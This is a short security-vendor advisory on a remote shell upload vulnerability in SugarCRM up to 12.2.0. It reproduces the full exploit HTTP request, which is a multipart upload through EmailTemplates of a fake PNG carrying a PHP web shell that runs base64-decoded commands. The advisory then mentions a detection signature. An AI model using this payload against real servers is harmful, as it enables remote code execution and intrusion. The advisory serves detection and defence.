SugarCRM is an open source customer relationship management suite.
SugarCRM versions up to 12.2.0 suffer from a remote shell upload vulnerability. SugarCRM could allow a remote authenticated attacker to execute arbitrary code on the system, caused by improper input validation.
By sending a specially crafted request, using the EmailTemplates, an attacker could exploit this vulnerability to execute arbitrary PHP code on the system.
POST /index.php HTTP/1.1 Host: 192.168.74.130:8080 User-Agent: python-requests/2.25.1 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Length: 577 Content-Type: multipart/form-data; boundary=24dca17724a5bf7732b724ccdaa83abd --24dca17724a5bf7732b724ccdaa83abd Content-Disposition: form-data; name="module" EmailTemplates --24dca17724a5bf7732b724ccdaa83abd Content-Disposition: form-data; name="action" AttachFiles --24dca17724a5bf7732b724ccdaa83abd Content-Disposition: form-data; name="file"; filename="sweet.phar" Content-Type: image/png .PNG . ... IHDR.............O.f....KPLTE<?php echo "#####"; passthru(base64_decode($_POST["c"])); echo "#####"; ?> ..x7... pHYs..........+.....*IDAT(.c`. ...YX..98..yx......ED..%.h..C...0..-L.Z.....IEND.B`. --24dca17724a5bf7732b724ccdaa83abd--
By turning this into a traffic file and matching rule, we are able to detect attempts to execute arbitrary code on the system.
Idappcom has created signature 8023455 along with a traffic file for this vulnerability.
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional